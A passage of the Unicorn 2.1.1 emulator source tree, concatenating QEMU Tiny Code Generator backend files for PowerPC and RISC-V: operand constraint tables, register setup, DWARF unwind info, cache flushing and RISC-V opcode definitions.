.args_ct_str = { "v", "v", "v", "v" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_ctpop_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_extract_i32: case INDEX_op_ld8u_i64: case 
INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: case INDEX_op_ctpop_i64: case INDEX_op_neg_i64: case INDEX_op_not_i64: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_extract_i64: return &r_r; case INDEX_op_add_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_andc_i32: case INDEX_op_orc_i32: case INDEX_op_eqv_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: case INDEX_op_setcond_i32: case INDEX_op_and_i64: case INDEX_op_andc_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: case INDEX_op_setcond_i64: return &r_r_ri; case INDEX_op_mul_i32: case INDEX_op_mul_i64: return &r_r_rI; case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_nand_i32: case INDEX_op_nor_i32: case INDEX_op_muluh_i32: case INDEX_op_mulsh_i32: case INDEX_op_orc_i64: case INDEX_op_eqv_i64: case INDEX_op_nand_i64: case INDEX_op_nor_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: return &r_r_r; case INDEX_op_sub_i32: return &r_rI_ri; case INDEX_op_add_i64: return &r_r_rT; case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rU; case INDEX_op_sub_i64: return &r_rI_rT; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: case INDEX_op_clz_i64: case INDEX_op_ctz_i64: return &r_r_rZW; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_ri; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return &movc; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_add2_i64: case INDEX_op_add2_i32: return &add2; case INDEX_op_sub2_i64: case INDEX_op_sub2_i32: return &sub2; case INDEX_op_qemu_ld_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &r_L : &r_L_L); case INDEX_op_qemu_st_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &S_S : &S_S_S); case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS == 32 ? &L_L_L : &L_L_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &S_S : TARGET_LONG_BITS == 32 ? &S_S_S : &S_S_S_S); case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_orc_vec: case INDEX_op_cmp_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_ppc_mrgh_vec: case INDEX_op_ppc_mrgl_vec: case INDEX_op_ppc_muleu_vec: case INDEX_op_ppc_mulou_vec: case INDEX_op_ppc_pkum_vec: case INDEX_op_ppc_rotl_vec: case INDEX_op_dup2_vec: return &v_v_v; case INDEX_op_not_vec: case INDEX_op_neg_vec: return &v_v; case INDEX_op_dup_vec: return have_isa_3_00 ? 
        &v_vr : &v_v;
    case INDEX_op_ld_vec:
    case INDEX_op_st_vec:
    case INDEX_op_dupm_vec:
        return &v_r;
    case INDEX_op_bitsel_vec:
    case INDEX_op_ppc_msum_vec:
        return &v_v_v_v;
    default:
        return NULL;
    }
}

static size_t dsize = 0;
static size_t isize = 0;

static void tcg_target_init(TCGContext *s)
{
    unsigned long hwcap = qemu_getauxval(AT_HWCAP);
    unsigned long hwcap2 = qemu_getauxval(AT_HWCAP2);

    /* Cache the data/instruction cache block sizes for flush_icache_range. */
    dsize = qemu_getauxval(AT_DCACHEBSIZE);
    isize = qemu_getauxval(AT_ICACHEBSIZE);

    have_isa = tcg_isa_base;
    if (hwcap & PPC_FEATURE_ARCH_2_06) {
        have_isa = tcg_isa_2_06;
    }
#ifdef PPC_FEATURE2_ARCH_2_07
    if (hwcap2 & PPC_FEATURE2_ARCH_2_07) {
        have_isa = tcg_isa_2_07;
    }
#endif
#ifdef PPC_FEATURE2_ARCH_3_00
    if (hwcap2 & PPC_FEATURE2_ARCH_3_00) {
        have_isa = tcg_isa_3_00;
    }
#endif

#ifdef PPC_FEATURE2_HAS_ISEL
    /* Prefer explicit instruction from the kernel. */
    have_isel = (hwcap2 & PPC_FEATURE2_HAS_ISEL) != 0;
#else
    /* Fall back to knowing Power7 (2.06) has ISEL. */
    have_isel = have_isa_2_06;
#endif

    if (hwcap & PPC_FEATURE_HAS_ALTIVEC) {
        have_altivec = true;
        /* We only care about the portion of VSX that overlaps Altivec. */
        if (hwcap & PPC_FEATURE_HAS_VSX) {
            have_vsx = true;
        }
    }

    s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff;
    s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff;
    if (have_altivec) {
        s->tcg_target_available_regs[TCG_TYPE_V64] = 0xffffffff00000000ull;
        s->tcg_target_available_regs[TCG_TYPE_V128] = 0xffffffff00000000ull;
    }

    s->tcg_target_call_clobber_regs = 0;
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R7);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R12);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V0);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V1);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V2);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V3);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V4);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V5);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V6);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V7);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V8);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V9);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V10);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V11);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V12);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V13);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V14);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V15);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V16);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V17);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V18);
    tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V19);

    s->reserved_regs = 0;
    tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* tcg temp */
    tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* stack pointer */
#if defined(_CALL_SYSV)
    tcg_regset_set_reg(s->reserved_regs, TCG_REG_R2); /* toc pointer */
#endif
#if defined(_CALL_SYSV) || TCG_TARGET_REG_BITS == 64
    tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */
#endif
    tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); /* mem temp */
    tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP1);
    tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP2);
    if (USE_REG_TB) {
        tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); /* tb->tc_ptr */
    }
}
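/*
 * What follows emits minimal DWARF unwind info so that tools such as GDB
 * can unwind through JIT-generated frames once tcg_register_jit has
 * published it.  As an illustration of the uleb128 encoding used in
 * fde_def_cfa: a hypothetical FRAME_SIZE of 416 (0x1a0) would encode as
 * the two bytes 0xa0 0x03, i.e. (416 & 0x7f) | 0x80 followed by 416 >> 7,
 * which is why the build asserts FRAME_SIZE fits in 14 bits (two bytes).
 */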
#ifdef __ELF__
typedef struct {
    DebugFrameCIE cie;
    DebugFrameFDEHeader fde;
    uint8_t fde_def_cfa[4];
    uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2 + 3];
} DebugFrame;

/* We're expecting a 2 byte uleb128 encoded value. */
QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14));

#if TCG_TARGET_REG_BITS == 64
# define ELF_HOST_MACHINE EM_PPC64
#else
# define ELF_HOST_MACHINE EM_PPC
#endif

static DebugFrame debug_frame = {
    .cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */
    .cie.id = -1,
    .cie.version = 1,
    .cie.code_align = 1,
    .cie.data_align = (-SZR & 0x7f),         /* sleb128 -SZR */
    .cie.return_column = 65,

    /* Total FDE size does not include the "len" member.  */
    .fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, fde.cie_offset),

    .fde_def_cfa = {
        12, TCG_REG_R1,                 /* DW_CFA_def_cfa r1, ... */
        (FRAME_SIZE & 0x7f) | 0x80,     /* ... uleb128 FRAME_SIZE */
        (FRAME_SIZE >> 7)
    },
    .fde_reg_ofs = {
        /* DW_CFA_offset_extended_sf, lr, LR_OFFSET */
        0x11, 65, (LR_OFFSET / -SZR) & 0x7f,
    }
};

void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size)
{
    uint8_t *p = &debug_frame.fde_reg_ofs[3];
    int i;

    for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i, p += 2) {
        p[0] = 0x80 + tcg_target_callee_save_regs[i];
        p[1] = (FRAME_SIZE - (REG_SAVE_BOT + i * SZR)) / SZR;
    }

    debug_frame.fde.func_start = (uintptr_t)buf;
    debug_frame.fde.func_len = buf_size;

    tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame));
}
#endif /* __ELF__ */

void flush_icache_range(uintptr_t start, uintptr_t stop)
{
    uintptr_t p, start1, stop1;

    start1 = start & ~(dsize - 1);
    stop1 = (stop + dsize - 1) & ~(dsize - 1);
    for (p = start1; p < stop1; p += dsize) {
        asm volatile ("dcbst 0,%0" : : "r"(p) : "memory");
    }
    asm volatile ("sync" : : : "memory");

    start1 = start & ~(isize - 1);
    stop1 = (stop + isize - 1) & ~(isize - 1);
    for (p = start1; p < stop1; p += isize) {
        asm volatile ("icbi 0,%0" : : "r"(p) : "memory");
    }
    asm volatile ("sync" : : : "memory");
    asm volatile ("isync" : : : "memory");
}
unicorn-2.1.1/qemu/tcg/ppc/tcg-target.opc.h
/*
 * Copyright (c) 2019 Linaro Limited
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 *
 * Target-specific opcodes for host vector expansion.  These will be
 * emitted by tcg_expand_vec_op.  For those familiar with GCC internals,
 * consider these to be UNSPEC with names.
 */

DEF(ppc_mrgh_vec, 1, 2, 0, IMPLVEC)
DEF(ppc_mrgl_vec, 1, 2, 0, IMPLVEC)
DEF(ppc_msum_vec, 1, 3, 0, IMPLVEC)
DEF(ppc_muleu_vec, 1, 2, 0, IMPLVEC)
DEF(ppc_mulou_vec, 1, 2, 0, IMPLVEC)
DEF(ppc_pkum_vec, 1, 2, 0, IMPLVEC)
DEF(ppc_rotl_vec, 1, 2, 0, IMPLVEC)
unicorn-2.1.1/qemu/tcg/riscv/
unicorn-2.1.1/qemu/tcg/riscv/tcg-target.h
/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2018 SiFive, Inc
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and
this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef RISCV_TCG_TARGET_H #define RISCV_TCG_TARGET_H #if __riscv_xlen == 32 # define TCG_TARGET_REG_BITS 32 #elif __riscv_xlen == 64 # define TCG_TARGET_REG_BITS 64 #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 20 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_ZERO, TCG_REG_RA, TCG_REG_SP, TCG_REG_GP, TCG_REG_TP, TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_S0, TCG_REG_S1, TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_A4, TCG_REG_A5, TCG_REG_A6, TCG_REG_A7, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_S9, TCG_REG_S10, TCG_REG_S11, TCG_REG_T3, TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, /* aliases */ TCG_AREG0 = TCG_REG_S0, TCG_GUEST_BASE_REG = TCG_REG_S1, TCG_REG_TMP0 = TCG_REG_T6, TCG_REG_TMP1 = TCG_REG_T5, TCG_REG_TMP2 = TCG_REG_T4, } TCGReg; /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_SP #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_movcond_i32 0 #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_div2_i32 0 #define TCG_TARGET_HAS_rot_i32 0 #define TCG_TARGET_HAS_deposit_i32 0 #define TCG_TARGET_HAS_extract_i32 0 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 (TCG_TARGET_REG_BITS == 32) #define TCG_TARGET_HAS_mulsh_i32 (TCG_TARGET_REG_BITS == 32) #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 0 #define TCG_TARGET_HAS_bswap32_i32 0 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_direct_jump 0 #define TCG_TARGET_HAS_brcond2 1 #define TCG_TARGET_HAS_setcond2 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_movcond_i64 0 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_div2_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_extrl_i64_i32 1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 
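/*
 * Note that the base RV64 ISA has no byte-swap or rotate instructions
 * (those arrive only with the later Zbb bit-manipulation extension), so
 * the bswap/rot flags below stay 0 and TCG expands such operations out
 * of shifts and masks.
 */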
#define TCG_TARGET_HAS_bswap16_i64 0
#define TCG_TARGET_HAS_bswap32_i64 0
#define TCG_TARGET_HAS_bswap64_i64 0
#define TCG_TARGET_HAS_not_i64 1
#define TCG_TARGET_HAS_neg_i64 1
#define TCG_TARGET_HAS_andc_i64 0
#define TCG_TARGET_HAS_orc_i64 0
#define TCG_TARGET_HAS_eqv_i64 0
#define TCG_TARGET_HAS_nand_i64 0
#define TCG_TARGET_HAS_nor_i64 0
#define TCG_TARGET_HAS_clz_i64 0
#define TCG_TARGET_HAS_ctz_i64 0
#define TCG_TARGET_HAS_ctpop_i64 0
#define TCG_TARGET_HAS_add2_i64 1
#define TCG_TARGET_HAS_sub2_i64 1
#define TCG_TARGET_HAS_mulu2_i64 0
#define TCG_TARGET_HAS_muls2_i64 0
#define TCG_TARGET_HAS_muluh_i64 1
#define TCG_TARGET_HAS_mulsh_i64 1
#endif

static inline void flush_icache_range(uintptr_t start, uintptr_t stop)
{
    __builtin___clear_cache((char *)start, (char *)stop);
}

/* not defined -- call should be eliminated at compile time */
void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t);

#define TCG_TARGET_DEFAULT_MO (0)

#ifdef CONFIG_SOFTMMU
#define TCG_TARGET_NEED_LDST_LABELS
#endif
#define TCG_TARGET_NEED_POOL_LABELS

#define TCG_TARGET_HAS_MEMORY_BSWAP 0

#endif
unicorn-2.1.1/qemu/tcg/riscv/tcg-target.inc.c
/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2018 SiFive, Inc
 * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org>
 * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net>
 * Copyright (c) 2008 Fabrice Bellard
 *
 * Based on i386/tcg-target.c and mips/tcg-target.c
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#include "../tcg-pool.inc.c"

#ifdef CONFIG_DEBUG_TCG
static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = {
    "zero", "ra", "sp", "gp", "tp", "t0", "t1", "t2",
    "s0", "s1", "a0", "a1", "a2", "a3", "a4", "a5",
    "a6", "a7", "s2", "s3", "s4", "s5", "s6", "s7",
    "s8", "s9", "s10", "s11", "t3", "t4", "t5", "t6"
};
#endif

static const int tcg_target_reg_alloc_order[] = {
    /* Call saved registers */
    /* TCG_REG_S0 reserved for TCG_AREG0 */
    TCG_REG_S1,
    TCG_REG_S2,
    TCG_REG_S3,
    TCG_REG_S4,
    TCG_REG_S5,
    TCG_REG_S6,
    TCG_REG_S7,
    TCG_REG_S8,
    TCG_REG_S9,
    TCG_REG_S10,
    TCG_REG_S11,

    /* Call clobbered registers */
    TCG_REG_T0,
    TCG_REG_T1,
    TCG_REG_T2,
    TCG_REG_T3,
    TCG_REG_T4,
    TCG_REG_T5,
    TCG_REG_T6,

    /* Argument registers */
    TCG_REG_A0,
    TCG_REG_A1,
    TCG_REG_A2,
    TCG_REG_A3,
    TCG_REG_A4,
    TCG_REG_A5,
    TCG_REG_A6,
    TCG_REG_A7,
};

static const int tcg_target_call_iarg_regs[] = {
    TCG_REG_A0,
    TCG_REG_A1,
    TCG_REG_A2,
    TCG_REG_A3,
    TCG_REG_A4,
    TCG_REG_A5,
    TCG_REG_A6,
    TCG_REG_A7,
};

static const int tcg_target_call_oarg_regs[] = {
    TCG_REG_A0,
    TCG_REG_A1,
};

#define TCG_CT_CONST_ZERO 0x100
#define TCG_CT_CONST_S12 0x200
#define TCG_CT_CONST_N12 0x400
#define TCG_CT_CONST_M12 0x800

static inline tcg_target_long sextreg(tcg_target_long val, int pos, int len)
{
    if (TCG_TARGET_REG_BITS == 32) {
        return sextract32(val, pos, len);
    } else {
        return sextract64(val, pos, len);
    }
}

/* parse target specific constraints */
static const char *target_parse_constraint(TCGArgConstraint *ct,
                                           const char *ct_str, TCGType type)
{
    switch (*ct_str++) {
    case 'r':
        ct->ct |= TCG_CT_REG;
        ct->u.regs = 0xffffffff;
        break;
    case 'L':
        /* qemu_ld/qemu_st constraint */
        ct->ct |= TCG_CT_REG;
        ct->u.regs = 0xffffffff;
        /* qemu_ld/qemu_st uses TCG_REG_TMP0 */
#if defined(CONFIG_SOFTMMU)
        tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[0]);
        tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[1]);
        tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[2]);
        tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[3]);
        tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[4]);
#endif
        break;
    case 'I':
        ct->ct |= TCG_CT_CONST_S12;
        break;
    case 'N':
        ct->ct |= TCG_CT_CONST_N12;
        break;
    case 'M':
        ct->ct |= TCG_CT_CONST_M12;
        break;
    case 'Z':
        /* we can use a zero immediate as a zero register argument.
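 * For example, a store of constant 0 can encode x0 as the source of the
 * SW directly instead of first materializing 0 in a scratch register;
 * tcg_out_sti below relies on exactly this.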
*/ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } if ((ct & TCG_CT_CONST_S12) && val == sextreg(val, 0, 12)) { return 1; } if ((ct & TCG_CT_CONST_N12) && -val == sextreg(-val, 0, 12)) { return 1; } if ((ct & TCG_CT_CONST_M12) && val >= -0xfff && val <= 0xfff) { return 1; } return 0; } /* * RISC-V Base ISA opcodes (IM) */ typedef enum { OPC_ADD = 0x33, OPC_ADDI = 0x13, OPC_AND = 0x7033, OPC_ANDI = 0x7013, OPC_AUIPC = 0x17, OPC_BEQ = 0x63, OPC_BGE = 0x5063, OPC_BGEU = 0x7063, OPC_BLT = 0x4063, OPC_BLTU = 0x6063, OPC_BNE = 0x1063, OPC_DIV = 0x2004033, OPC_DIVU = 0x2005033, OPC_JAL = 0x6f, OPC_JALR = 0x67, OPC_LB = 0x3, OPC_LBU = 0x4003, OPC_LD = 0x3003, OPC_LH = 0x1003, OPC_LHU = 0x5003, OPC_LUI = 0x37, OPC_LW = 0x2003, OPC_LWU = 0x6003, OPC_MUL = 0x2000033, OPC_MULH = 0x2001033, OPC_MULHSU = 0x2002033, OPC_MULHU = 0x2003033, OPC_OR = 0x6033, OPC_ORI = 0x6013, OPC_REM = 0x2006033, OPC_REMU = 0x2007033, OPC_SB = 0x23, OPC_SD = 0x3023, OPC_SH = 0x1023, OPC_SLL = 0x1033, OPC_SLLI = 0x1013, OPC_SLT = 0x2033, OPC_SLTI = 0x2013, OPC_SLTIU = 0x3013, OPC_SLTU = 0x3033, OPC_SRA = 0x40005033, OPC_SRAI = 0x40005013, OPC_SRL = 0x5033, OPC_SRLI = 0x5013, OPC_SUB = 0x40000033, OPC_SW = 0x2023, OPC_XOR = 0x4033, OPC_XORI = 0x4013, #if TCG_TARGET_REG_BITS == 64 OPC_ADDIW = 0x1b, OPC_ADDW = 0x3b, OPC_DIVUW = 0x200503b, OPC_DIVW = 0x200403b, OPC_MULW = 0x200003b, OPC_REMUW = 0x200703b, OPC_REMW = 0x200603b, OPC_SLLIW = 0x101b, OPC_SLLW = 0x103b, OPC_SRAIW = 0x4000501b, OPC_SRAW = 0x4000503b, OPC_SRLIW = 0x501b, OPC_SRLW = 0x503b, OPC_SUBW = 0x4000003b, #else /* Simplify code throughout by defining aliases for RV32. 
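 * On RV32 the W-suffixed (32-bit) opcodes do not exist, but there every
 * 32-bit TCG operation is simply the native XLEN-wide instruction, so
 * aliasing OPC_ADDW to OPC_ADD (and so on) lets the code generator use
 * the W forms unconditionally for _i32 ops.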
